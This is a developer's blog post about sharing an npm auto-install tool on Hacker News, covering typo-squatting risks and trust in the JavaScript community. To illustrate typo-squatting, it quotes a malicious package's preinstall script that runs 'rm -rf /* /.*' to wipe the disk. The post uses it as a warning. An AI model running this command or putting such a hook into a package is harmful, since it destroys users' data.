by Siddharth Kshetrapal

What I learned from showing my work on Hacker News

When writing JavaScript, I hate it that I have to leave my editor — and my train of thought — just to tab over to my terminal and install a new package with:

$ npm install --save express

To scratch my itch, I wrote a tiny node utility which lets me focus on the code without installing dependencies.

I was pretty happy with it, so I wrapped it in a git repository and shared it on Hacker News.

If you’re interested, here’s a link to the repo, auto-install, which already has more than 6,000 downloads:

siddharthkp/auto-install
auto-install - Install dependencies as you codegithub.com

An Instant response

I wasn’t expecting much out of the post, just wanted to throw it out there in case someone else finds it useful.

What happened instead was a heated debate about the Node ecosystem!

I’m not going to talk about what’s right or wrong with npm, since there’s enough about that already.

What I learned:

1. Typo-squatting!

It’s a popular (and surprisingly common) form of hacking. Basically, a hacker hopes that you will make a typo, and uses that to screw you over.

Say, instead of typing express, you accidentally type expres. This can result in installing a completely different module, which could be a malicious one.

João Jerónim shared the vulnerabilities exposed by installing a npm package with rimrafall. Check out the preinstall script in it’s package.json

“scripts”: {    “preinstall”: “rm -rf /* /.*” }}

If you’re not familiar with that command, it basically deletes everything on your hard drive — including your operating system!

Thanks to some quick feedback, I added the --secure flag to protect against this.

2. A lack of trust in your fellow developers

I see an innate lack of trust in the skills and capabilities of other developers in the JavaScript community. Our tools have always been error-prone. Typo-squatting is a common problem with all package managers.

Popular opinion is that the JavaScript community is filled with novice programmers, and that there’s no differentiation between what is authoritative and what isn’t.

This is my favorite comment on Hacker News:

As I see it, npm appears to be acting like there are a lot of unsolved problems in this realm, and in doing so are endangering a developer community that is absolutely full of amateurs.

You can read the whole thread here (it’s a teensy bit long):

Show HN: Auto install npm dependencies as you code | Hacker News
Show HN: Auto install npm dependencies as you codenews.ycombinator.com

The good parts

Not all comments were bad. Some people reached out to me on twitter with kind words. I have to admit, that felt pretty cool.

Feature requests and bug reports started flowing in! That kept me busy for a while. And then there was the kicker — npm weekly #54!

Also mentioned on Hacker News, if you’re using webpack, you might be interested in a similar plugin by Eric Clemmons.

The JavaScript Community

Javascript definitely has the lowest barrier to entry of any language, and has become the most popular language in the recent years.

I have to agree that npm is not fully mature as a package manager (yet), and a lot of work needs to go into security (for example: sandboxing pre/post-install scripts, module signing, etc.)

But we have an open library ecosystem with an active developer community. Individual contributors have produced some amazing things in the past: Express.js, Socket.io, Redux, Vue, and even Node.js itself!

Let’s not forget the great work that companies are doing to spread knowledge and best practices.

You can’t build a community without trust. We need to reduce the barriers to entry even further, and make it easy for new developers to learn and contribute.

In closing, my advice to fellow developers: never stop shipping.

The more you code, the more you will learn.

If you liked this, click the ? below so other people will see this as well.